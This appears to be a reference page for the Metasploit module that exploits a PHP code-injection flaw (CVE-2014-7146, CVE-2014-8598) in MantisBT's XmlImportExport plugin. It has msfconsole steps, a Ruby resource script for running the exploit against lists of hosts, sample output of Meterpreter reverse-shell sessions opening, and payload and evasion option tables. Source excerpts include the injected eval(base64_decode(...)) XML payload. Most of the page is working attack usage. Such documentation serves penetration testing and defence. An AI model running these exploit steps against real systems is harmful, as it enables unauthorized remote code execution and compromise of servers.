MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability - Metasploit


This page contains detailed information about how to use the exploit/multi/http/mantisbt_php_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability
Module: exploit/multi/http/mantisbt_php_exec
Source code: modules/exploits/multi/http/mantisbt_php_exec.rb
Disclosure date: 2014-11-08
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2014-7146, CVE-2014-8598

This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed. The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier. This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine. This version also suffers from another issue. The import page is not checking the correct user level of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Using mantisbt_php_exec against a single host

Normally, you can use exploit/multi/http/mantisbt_php_exec this way:

msf > use exploit/multi/http/mantisbt_php_exec
msf exploit(mantisbt_php_exec) > show targets
    ... a list of targets ...
msf exploit(mantisbt_php_exec) > set TARGET target-id
msf exploit(mantisbt_php_exec) > show options
    ... show and set options ...
msf exploit(mantisbt_php_exec) > exploit

Using mantisbt_php_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your mantisbt_php_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/mantisbt_php_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the multi/http/mantisbt_php_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/mantisbt_php_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/mantisbt_php_exec) > show info

       Name: MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability
     Module: exploit/multi/http/mantisbt_php_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2014-11-08

Provided by:
  Egidio Romano
  Juan Escobar <[email protected]>
  Christian Mehlmauer <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Generic (PHP Payload)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   root             yes       Pasword to authenticate as
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base directory path
  USERNAME   administrator    yes       Username to authenticate as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a post-auth vulnerability found in MantisBT 
  versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is 
  installed. The vulnerable code exists on 
  plugins/XmlImportExport/ImportXml.php, which receives user input 
  through the "description" field and the "issuelink" attribute of an 
  uploaded XML file and passes to preg_replace() function with the /e 
  modifier. This allows a remote authenticated attacker to execute 
  arbitrary PHP code on the remote machine. This version also suffers 
  from another issue. The import page is not checking the correct user 
  level of the user, so it's possible to exploit this issue with any 
  user including the anonymous one if enabled.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-7146
  https://nvd.nist.gov/vuln/detail/CVE-2014-8598
  https://www.mantisbt.org/bugs/view.php?id=17725
  https://www.mantisbt.org/bugs/view.php?id=17780

Module Options


This is a complete list of options available in the multi/http/mantisbt_php_exec exploit:

msf6 exploit(multi/http/mantisbt_php_exec) > show options

Module options (exploit/multi/http/mantisbt_php_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   root             yes       Pasword to authenticate as
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base directory path
   USERNAME   administrator    yes       Username to authenticate as
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (PHP Payload)

Advanced Options


Here is a complete list of advanced options supported by the multi/http/mantisbt_php_exec exploit:

msf6 exploit(multi/http/mantisbt_php_exec) > show advanced

Module advanced options (exploit/multi/http/mantisbt_php_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/mantisbt_php_exec module can exploit:

msf6 exploit(multi/http/mantisbt_php_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic (PHP Payload)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/mantisbt_php_exec exploit:

msf6 exploit(multi/http/mantisbt_php_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/mantisbt_php_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/mantisbt_php_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Can not detect Mantis version


Here is a relevant code snippet related to the "Can not detect Mantis version" error message:

78:	        print_status("Detected Mantis version #{version}")
79:	        return version
80:	      end
81:	    end
82:	
83:	    print_status("Can not detect Mantis version")
84:	    return nil
85:	  end
86:	
87:	  def check
88:	    version = get_mantis_version

Anonymous access enabled, no need to log in


Here is a relevant code snippet related to the "Anonymous access enabled, no need to log in" error message:

106:	      'method'   => 'GET',
107:	      'uri'      => normalize_uri(target_uri.path, 'login_anon.php')
108:	    })
109:	    # if the redirect contains a username (non empty), anonymous access is enabled
110:	    if res && res.redirect? && res.redirection && res.redirection.query =~ /username=[^&]+/
111:	      print_status('Anonymous access enabled, no need to log in')
112:	      session_cookie = res.get_cookies
113:	    else
114:	      res = send_request_cgi({
115:	        'method'   => 'GET',
116:	        'uri'      => normalize_uri(target_uri.path, 'login_page.php'),

Login failed


Here is a relevant code snippet related to the "Login failed" error message:

129:	          'username' => datastore['username'],
130:	          'password' => datastore['password'],
131:	          'secure_session' => 'on'
132:	        }
133:	      })
134:	      fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
135:	
136:	      fail_with(Failure::NoAccess, 'Wrong credentials') unless res && !res.redirection.to_s.include?('login_page.php')
137:	
138:	      session_cookie = "#{session_cookie} #{res.get_cookies}"
139:	    end

Wrong credentials


Here is a relevant code snippet related to the "Wrong credentials" error message:

131:	          'secure_session' => 'on'
132:	        }
133:	      })
134:	      fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
135:	
136:	      fail_with(Failure::NoAccess, 'Wrong credentials') unless res && !res.redirection.to_s.include?('login_page.php')
137:	
138:	      session_cookie = "#{session_cookie} #{res.get_cookies}"
139:	    end
140:	
141:	    session_cookie

Error trying to access XmlImportExport/import page...


Here is a relevant code snippet related to the "Error trying to access XmlImportExport/import page..." error message:

160:	        'page' => 'XmlImportExport/import'
161:	      }
162:	    })
163:	
164:	    unless res && res.code == 200 && res.body
165:	      print_error('Error trying to access XmlImportExport/import page...')
166:	      return false
167:	    end
168:	
169:	    if res.body.include?('Plugin is not registered with MantisBT')
170:	      print_error('XMLImportExport plugin is not installed')

XMLImportExport plugin is not installed


Here is a relevant code snippet related to the "XMLImportExport plugin is not installed" error message:

165:	      print_error('Error trying to access XmlImportExport/import page...')
166:	      return false
167:	    end
168:	
169:	    if res.body.include?('Plugin is not registered with MantisBT')
170:	      print_error('XMLImportExport plugin is not installed')
171:	      return false
172:	    end
173:	
174:	    # Retrieving CSRF token
175:	    if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/

Error trying to read CSRF token


Here is a relevant code snippet related to the "Error trying to read CSRF token" error message:

173:	
174:	    # Retrieving CSRF token
175:	    if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
176:	      csrf_token = Regexp.last_match[1]
177:	    else
178:	      print_error('Error trying to read CSRF token')
179:	      return false
180:	    end
181:	
182:	    # Retrieving default project id
183:	    if res.body =~ /name="project_id" value="([0-9]+)"/

Error trying to read project id


Here is a relevant code snippet related to the "Error trying to read project id" error message:

181:	
182:	    # Retrieving default project id
183:	    if res.body =~ /name="project_id" value="([0-9]+)"/
184:	      project_id = Regexp.last_match[1]
185:	    else
186:	      print_error('Error trying to read project id')
187:	      return false
188:	    end
189:	
190:	    # Retrieving default category id
191:	    if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/

Error trying to read default category


Here is a relevant code snippet related to the "Error trying to read default category" error message:

190:	    # Retrieving default category id
191:	    if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
192:	      category_id = Regexp.last_match[1]
193:	      category_name = Regexp.last_match[2]
194:	    else
195:	      print_error('Error trying to read default category')
196:	      return false
197:	    end
198:	
199:	    # Retrieving default max file size
200:	    if res.body =~ /name="max_file_size" value="([0-9]+)"/

Error trying to read default max file size


Here is a relevant code snippet related to the "Error trying to read default max file size" error message:

198:	
199:	    # Retrieving default max file size
200:	    if res.body =~ /name="max_file_size" value="([0-9]+)"/
201:	      max_file_size = Regexp.last_match[1]
202:	    else
203:	      print_error('Error trying to read default max file size')
204:	      return false
205:	    end
206:	
207:	    # Retrieving default step
208:	    if res.body =~ /name="step" value="([0-9]+)"/

Error trying to read default step value


Here is a relevant code snippet related to the "Error trying to read default step value" error message:

206:	
207:	    # Retrieving default step
208:	    if res.body =~ /name="step" value="([0-9]+)"/
209:	      step = Regexp.last_match[1]
210:	    else
211:	      print_error('Error trying to read default step value')
212:	      return false
213:	    end
214:	
215:	    xml_file =   %Q|
216:	    <mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">

APPLICATION ERROR


Here is a relevant code snippet related to the "APPLICATION ERROR" error message:

255:	      'cookie' => cookies,
256:	      'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
257:	      'data'    => data_post
258:	    }, timeout)
259:	
260:	    if res && res.body && res.body.include?('APPLICATION ERROR')
261:	      print_error('Error on uploading XML')
262:	      return false
263:	    end
264:	
265:	    # request above will time out and return nil on success

Error on uploading XML


Here is a relevant code snippet related to the "Error on uploading XML" error message:

256:	      'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
257:	      'data'    => data_post
258:	    }, timeout)
259:	
260:	    if res && res.body && res.body.include?('APPLICATION ERROR')
261:	      print_error('Error on uploading XML')
262:	      return false
263:	    end
264:	
265:	    # request above will time out and return nil on success
266:	    return true

Error accessing MantisBT


Here is a relevant code snippet related to the "Error accessing MantisBT" error message:

271:	    res = send_request_cgi({
272:	      'method'   => 'GET',
273:	      'uri'      => normalize_uri(target_uri.path)
274:	    })
275:	
276:	    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && (res.code == 200 || res.redirection)
277:	
278:	    # remove comments, line breaks and spaces of php_code
279:	    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
280:	
281:	    # clean b64 payload

Error trying to access My View page


Here is a relevant code snippet related to the "Error trying to access My View page" error message:

302:	      'uri'    => normalize_uri(target_uri.path, 'my_view_page.php'),
303:	      'cookie' => cookies
304:	    })
305:	
306:	    unless res && res.code == 200
307:	      print_error('Error trying to access My View page')
308:	      return false
309:	    end
310:	
311:	    if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
312:	      issue_id = Regexp.last_match[1]

Error trying to retrieve issue id


Here is a relevant code snippet related to the "Error trying to retrieve issue id" error message:

309:	    end
310:	
311:	    if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
312:	      issue_id = Regexp.last_match[1]
313:	     else
314:	      print_error('Error trying to retrieve issue id')
315:	      return false
316:	    end
317:	
318:	    res = send_request_cgi({
319:	      'method'   => 'GET',

Error trying to retrieve CSRF token


Here is a relevant code snippet related to the "Error trying to retrieve CSRF token" error message:

326:	    })
327:	
328:	    if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
329:	      csrf_token = Regexp.last_match[1]
330:	    else
331:	      print_error('Error trying to retrieve CSRF token')
332:	      return false
333:	    end
334:	
335:	    res = send_request_cgi({
336:	      'method'   => 'POST',

Removing issue number (<VALUE>) has failed


Here is a relevant code snippet related to the "Removing issue number (<VALUE>) has failed" error message:

344:	    })
345:	
346:	    if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
347:	      print_status("Issue number (#{ issue_id }) removed")
348:	    else
349:	      print_error("Removing issue number (#{ issue_id }) has failed")
350:	      return false
351:	    end
352:	
353:	    # if check return the response
354:	    if is_check

Exploit failed, aborting.


Here is a relevant code snippet related to the "Exploit failed, aborting." error message:

357:	      return true
358:	    end
359:	  end
360:	
361:	  def exploit
362:	    get_mantis_version
363:	    unless exec_php(payload.encoded)
364:	      fail_with(Failure::Unknown, 'Exploit failed, aborting.')
365:	    end
366:	  end
367:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Egidio Romano
  • Juan Escobar <eng.jescobar[at]gmail.com>
  • Christian Mehlmauer

Version


This page has been produced using Metasploit Framework version 6.1.31-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.